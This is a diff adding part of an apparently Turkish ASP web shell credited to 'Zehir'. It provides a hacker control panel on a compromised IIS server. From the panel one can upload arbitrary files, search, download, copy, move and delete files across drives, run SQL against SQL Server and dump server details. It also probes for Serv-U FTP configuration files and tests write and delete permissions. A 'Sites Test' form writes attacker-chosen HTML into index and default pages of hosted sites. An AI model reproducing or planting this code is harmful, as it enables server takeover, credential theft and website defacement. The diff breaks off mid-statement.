+<a href="<%=dosyaPath%>?mevla=1&status=50&path=<%=path%>" onclick="SitelerTestte(this.href);return false;">Sites Test</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=14&path=<%=path%>" onclick="klasorIslemleri(this.href);return false;">Folder Action</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=15" onclick="sqlServer(this.href);return false;">SQL Server</a>
+<font color=yellow> | </font>
+<a href="<%=dosyaPath%>?mevla=1&status=33" onclick="poweredby(this.href);return false;">POWERED BY</a>
+<script language=javascript>
+    function sistemBilgisi(yol){
+        NewWindow(yol,"",600,240,"no");
+    }
+    function SitelerTestte(yol){
+        NewWindow(yol,"",530,420,"no");
+    }
+    function klasorIslemleri(yol){
+        NewWindow(yol,"",400,280,"no");
+    }
+    function sqlServer(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function poweredby(yol){
+        NewWindow(yol,"",300,50,"no");
+    }
+    function sistemTest(yol){
+        NewWindow(yol,"",400,300,"no");
+    }
+</script>
+<%
+end if
+'####################################
+Class clsUpload
+    Private mbinData
+    Private mlngChunkIndex
+    Private mlngBytesReceived
+    Private mstrDelimiter
+    Private CR
+    Private LF
+    Private CRLF
+    Private mobjFieldAry()
+    Private mlngCount
+
+    Private Sub RequestData
+        Dim llngLength
+        mlngBytesReceived = Request.TotalBytes
+        mbinData = Request.BinaryRead(mlngBytesReceived)
+    End Sub
+
+    Private Sub ParseDelimiter()
+        mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
+    End Sub
+
+    Private Sub ParseData()
+        Dim llngStart
+        Dim llngLength
+        Dim llngEnd
+        Dim lbinChunk
+        llngStart = 1
+        llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
+        While Not llngStart = 0
+            llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
+            llngLength = llngEnd - llngStart
+            lbinChunk = MidB(mbinData, llngStart, llngLength)
+            Call ParseChunk(lbinChunk)
+            llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
+        Wend
+    End Sub
+
+    Private Sub ParseChunk(ByRef pbinChunk)
+        Dim lstrName
+        Dim lstrFileName
+        Dim lstrContentType
+        Dim lbinData
+        Dim lstrDisposition
+        Dim lstrValue
+        lstrDisposition = ParseDisposition(pbinChunk)
+        lstrName = ParseName(lstrDisposition)
+        lstrFileName = ParseFileName(lstrDisposition)
+        lstrContentType = ParseContentType(pbinChunk)
+        If lstrContentType = "" Then
+            lstrValue = CStrU(ParseBinaryData(pbinChunk))
+        Else
+            lbinData = ParseBinaryData(pbinChunk)
+        End If
+        Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
+    End Sub
+
+    Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
+        Dim lobjField
+        ReDim Preserve mobjFieldAry(mlngCount)
+        Set lobjField = New clsField
+        lobjField.Name = pstrName
+        lobjField.FilePath = pstrFileName
+        lobjField.ContentType = pstrContentType
+        If LenB(pbinData) = 0 Then
+            lobjField.BinaryData = ChrB(0)
+            lobjField.Value = pstrValue
+            lobjField.Length = Len(pstrValue)
+        Else
+            lobjField.BinaryData = pbinData
+            lobjField.Length = LenB(pbinData)
+            lobjField.Value = ""
+        End If
+        Set mobjFieldAry(mlngCount) = lobjField
+        mlngCount = mlngCount + 1
+    End Sub
+
+    Private Function ParseBinaryData(ByRef pbinChunk)
+        Dim llngStart
+        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+        If llngStart = 0 Then Exit Function
+        llngStart = llngStart + 4
+        ParseBinaryData = MidB(pbinChunk, llngStart)
+    End Function
+
+    Private Function ParseContentType(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 15
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+    End Function
+
+    Private Function ParseDisposition(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 22
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+    End Function
+
+    Private Function ParseName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 6
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+' ------------------------------------------------------------------------------
+    Private Function ParseFileName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 10
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+
+    Public Property Get Count()
+        Count = mlngCount
+    End Property
+
+    Public Default Property Get Fields(ByVal pstrName)
+        Dim llngIndex
+        If IsNumeric(pstrName) Then
+            llngIndex = CLng(pstrName)
+            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+                Exit Property
+            End If
+            Set Fields = mobjFieldAry(pstrName)
+        Else
+            pstrName = LCase(pstrname)
+            For llngIndex = 0 To mlngCount - 1
+                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+                    Set Fields = mobjFieldAry(llngIndex)
+                    Exit Property
+                End If
+            Next
+        End If
+        Set Fields = New clsField
+    End Property
+
+    Private Sub Class_Terminate()
+        Dim llngIndex
+        For llngIndex = 0 To mlngCount - 1
+            Set mobjFieldAry(llngIndex) = Nothing
+
+        Next
+        ReDim mobjFieldAry(-1)
+    End Sub
+
+    Private Sub Class_Initialize()
+        ReDim mobjFieldAry(-1)
+        CR = ChrB(Asc(vbCr))
+        LF = ChrB(Asc(vbLf))
+        CRLF = CR & LF
+        mlngCount = 0
+        Call RequestData
+        Call ParseDelimiter()
+        Call ParseData
+    End Sub
+
+    Private Function CStrU(ByRef pstrANSI)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = LenB(pstrANSI)
+        For llngIndex = 1 To llngLength
+            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+        Next
+    End Function
+
+    Private Function CStrB(ByRef pstrUnicode)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = Len(pstrUnicode)
+        For llngIndex = 1 To llngLength
+            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+        Next
+    End Function
+End Class
+'####################################
+Session("n1") = "by Ejder"
+Class clsField
+    Public Name
+    Private mstrPath
+    Public FileDir
+    Public FileExt
+    Public FileName
+    Public ContentType
+    Public Value
+    Public BinaryData
+    Public Length
+    Private mstrText
+
+    Public Property Get BLOB()
+        BLOB = BinaryData
+    End Property
+
+    Public Function BinaryAsText()
+        Dim lbinBytes
+        Dim lobjRs
+        If Length = 0 Then Exit Function
+        If LenB(BinaryData) = 0 Then Exit Function
+
+        If Not Len(mstrText) = 0 Then
+            BinaryAsText = mstrText
+            Exit Function
+        End If
+        lbinBytes = ASCII2Bytes(BinaryData)
+           mstrText = Bytes2Unicode(lbinBytes)
+        BinaryAsText = mstrText
+    End Function
+
+    Public Sub SaveAs(ByRef pstrFileName)
+        Const adTypeBinary=1
+        Const adSaveCreateOverWrite=2
+        Dim lobjStream
+        Dim lobjRs
+        Dim lbinBytes
+        If Length = 0 Then Exit Sub
+        If LenB(BinaryData) = 0 Then Exit Sub
+        Set lobjStream = Server.CreateObject("ADODB.Stream")
+        lobjStream.Type = adTypeBinary
+        Call lobjStream.Open()
+        lbinBytes = ASCII2Bytes(BinaryData)
+        Call lobjStream.Write(lbinBytes)
+
+        On Error Resume Next
+
+        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+
+        'if err<>0 then response.Write "<br>"&err.Description
+
+        Call lobjStream.Close()
+        Set lobjStream = Nothing
+    End Sub
+
+    Public Property Let FilePath(ByRef pstrPath)
+        mstrPath = pstrPath
+        If Not InStrRev(pstrPath, ".") = 0 Then
+            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+            FileExt = UCase(FileExt)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+        End If
+    End Property
+
+    Public Property Get FilePath()
+        FilePath = mstrPath
+    End Property
+
+    private Function ASCII2Bytes(ByRef pbinBinaryData)
+        Const adLongVarBinary=205
+        Dim lobjRs
+        Dim llngLength
+        Dim lbinBuffer
+        llngLength = LenB(pbinBinaryData)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+        Call lobjRs.Update()
+        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        ASCII2Bytes = lbinBuffer
+    End Function
+
+    Private Function Bytes2Unicode(ByRef pbinBytes)
+        Dim lobjRs
+        Dim llngLength
+        Dim lstrBuffer
+        llngLength = LenB(pbinBytes)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+        Call lobjRs.Update()
+        lstrBuffer = lobjRs.Fields("BinaryData").Value
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        Bytes2Unicode = lstrBuffer
+    End Function
+End Class
+Session("n2") = "EJDER"
+'####################################
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+    dim objUpload,f,max,i,name,path,size,success
+
+    set objUpload=New clsUpload
+
+    targetPath=objUpload.Fields("folder").Value
+    max=objUpload.Fields("max").Value
+
+    for i=1 to max
+        name=objUpload.Fields("file" & i).FileName
+        size=objUpload.Fields("file" & i).Length
+        if (name<>"") and (size>0) then
+            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+            path=addslash(targetPath) & name
+            objUpload.Fields("file" & i).SaveAs path
+
+            if objFSO.FileExists(path) then
+                on error resume next
+                set f=objFSO.GetFile(path)
+                if IsObject(f) then
+                    if f.Size=size then success=true else success=false
+                end if
+                set f=nothing
+            end if
+            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+        end if
+    next
+    response.Write gMsg
+    set objUpload=nothing
+
+end sub
+
+if status="-4" then
+    Upload()
+'    hataKontrol
+    popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+    if err<>0 then
+        Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+    end if
+end sub
+
+sub araBul(path_,ara_)
+    on error resume next
+    If Len(path_) > 0 Then
+        cur = path_&"\"
+        If cur = "\\" Then cur = ""
+            parent = ""
+            If InStrRev(cur,"\") > 0 Then
+            parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+        End If
+    Else
+        cur = ""
+    End If
+
+    Set f = objFSO.GetFolder(cur)
+
+    Set fc = f.Files
+    For Each f1 In fc
+        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+            downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>Í</a></font>"
+            if lcase(ara_)="mdb" then
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            else
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>û</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            end if
+        end if
+    Next
+
+    Set fs = f.SubFolders
+    For Each f1 In fs
+        araBul f1.path,ara_
+    Next
+    Set    f        = Nothing
+    Set fc        = Nothing
+    Set fs        = Nothing
+end sub
+
+sub sistemTest
+    response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+    response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonuç</td></tr>"
+
+    servu_Test
+    WriteTestOnDriver
+    WriteTestOnLocalPath
+    LocalPathParentFolder
+    LocalPathPParentFolder
+
+    response.Write "</table>"
+end sub
+
+sub servu_Test
+    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            for each d_ in dosya_
+                d_ = drive_.DriveLetter&":\"&d_
+                if objFSO.FileExists(d_) then
+                    response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+                end if
+            next
+        end if
+    next
+end sub
+
+function yaziyomu(yol)
+    on error goto 0:on error resume next
+    dim sonuc__
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        sonuc__="<font color=red>Yazma Hakký Yok!</font>"
+    else
+        sonuc__="<font color=yellow>Yazma Hakký Var!</font>"
+        on error goto 0: on error resume next
+        objFSO.DeleteFile yol & "\test.zehir",true
+        if err<>0 then
+            sonuc__=sonuc__&"<br><font color=red>Silme Hakký Yok!</font>"
+        else
+            sonuc__=sonuc__&"<br><font color=yellow>Silme Hakký Var!</font>"
+        end if
+    end if
+    yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+    on error goto 0:on error resume next
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        yaziyomu2 = false
+    else
+        objFSO.DeleteFile yol & "\test.zehir"
+        yaziyomu2 = true
+    end if
+end function
+
+sub WriteTestOnDriver
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            if not yaziyomu2(drive_.DriveLetter&":\") then
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+            else
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+            end if
+        end if
+    next
+end sub
+
+sub WriteTestOnLocalPath
+    on error goto 0
+    on error resume next
+    if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+        Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+    end if
+end sub
+
+sub LocalPathParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+sub LocalPathPParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    hed_ = left(hed_,InStrRev(hed_,"\"))
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        if err=451 then
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data Üst Klasor Yok :)</td></tr>"
+        else
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Oluþtu : ["&err.Description&"]</td></tr>"
+        end if
+    else
+        Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+    Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+    Response.Write "</table>"
+    popup = false
+CASE 14 'Upload and Search
+    aramaUpload
+    popup = false
+    hataKontrol
+CASE 15 'Ms. SQL Server
+    Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server için connection string giriniz</td></tr><tr><td align=center>"
+    Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+    response.Write "<input type=submit value='SQL Servera Baðlan' style='height:23;width:170' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 16 'file Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 17 'file Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFile path,cf
+        isl="kopyalandý.."
+    elseif islem="tasi" then
+        objFSO.MoveFile path,cf
+        isl="taþýndý.."
+    end if
+    response.Write "Dosya "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 18 'folder Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 19 'folder Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFolder path,cf
+        isl="kopyalandý.."
+    elseif islem="tasi" then
+        objFSO.MoveFolder path,cf
+        isl="taþýndý.."
+    end if
+    response.Write "Klasor "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 33 'Powered By
+    response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+    response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>küllü nefsun zaifetun mevt"
+    popup = false
+    hataKontrol
+CASE 40 'Sistem Test
+    sistemTest
+    popup=false
+CASE 50 'Siteleri Test Edelim :D
+    %>
+    <table width="100%" cellpadding=0 cellspacing=0>
+        <tr>
+            <td align=center>
+                <b>Güvenlik Testi byZehir</b>
+                <br>
+                <form action="<%=dosyaPath%>" method=post id=frmMesaj>
+                    <input type=hidden name=kuskapani value=2>
+                    <table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+                        <tr>
+                            <td width=100>Path</td>
+                            <td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>Sub Folder</td>
+                            <td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>File Name</td>
+                            <td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
+                        </tr>
+                        <tr>
+                            <td colspan=2>
+                                <table width="100%" align=center>
+                                    <tr>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
+                                            <input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
+                                        </td>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
+                                            <input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
+                                        </td>
+                                    </tr>
+                                </table>
+                            </td>
+                        </tr>
+                        <tr>
+                            <td colspan=2 align=center>
+                                <a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+                                <a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+                                <a href="#" onClick="FormatText('paste')" alt="Yapýþtýr">Yapýþtýr</a>
+                                <a href="#" alt="Kalýn" onClick="FormatText('bold', '')">Bold</a>
+                                <a href="#" alt="Ýtalic" onClick="FormatText('italic', '')">Italic</a>
+                                <a href="#" alt="Altý Çizili" onClick="FormatText('underline', '')">UnderLine</a>
+                                <a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizalý">JustifyLeft</a>
+                                <a href="#" alt="Ortada Hizalý" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+                                <a href="#" onClick="FormatText('JustifyRight', '')" alt="Saða Hizalý">JustifyRight</a>
+                                <a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+                                <a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+                                <select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kýrmýzý</option>
+                                  <option value="green">Yeþil</option>
+                                  <option value="yellow">Sarý</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açýk Mavi</option>
+                                  <option value="limegreen">Açýk Yeþil</option>
+                                </select>
+                                <select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">Kýrmýzý</option>
+                                  <option value="green">Yeþil</option>
+                                  <option value="yellow">Sarý</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">Açýk Mavi</option>
+                                  <option value="limegreen">Açýk Yeþil</option>
+                                </select>
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+                                <iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")%>"></iframe>
+                                <script language=javascript>
+                                    frames.byZehir.document.designMode = "On";
+                                    function bgc(option){
+                                        frames.byZehir.document.body.bgColor=option;
+                                    }
+                                    function FormatText(command, option){
+                                        frames.byZehir.focus();
+                                          frames.byZehir.document.execCommand(command, false, option);
+                                          frames.byZehir.focus();
+                                    }
+                                    function AddImage(){
+                                        imagePath = prompt('Eklemek istediðiniz resmin web adresini yazýn', 'http://');
+
+                                        if ((imagePath != null) && (imagePath != "")){
+                                            frames.byZehir.focus();
+                                            frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+                                        }
+                                        frames.byZehir.focus();
+                                    }
+                                </script>
+                                <input type=hidden value="" id=byMesaj name=byMesaj>
+                                <input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+                            </td>
+                        </tr>
+                    </table>
+                </form>
+            </td>
+        </tr>
+    </table>
+    <%
+    popup=false
+CASE 51 ' Özel þilemler
+END SELECT
+%>
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function ffd(yol){
+        NewWindow(yol,"",420,100,"no");
+    }
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+    if status=7 or status=8 then
+        Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+        Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL Çalýþtýr</td><td>"
+        Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
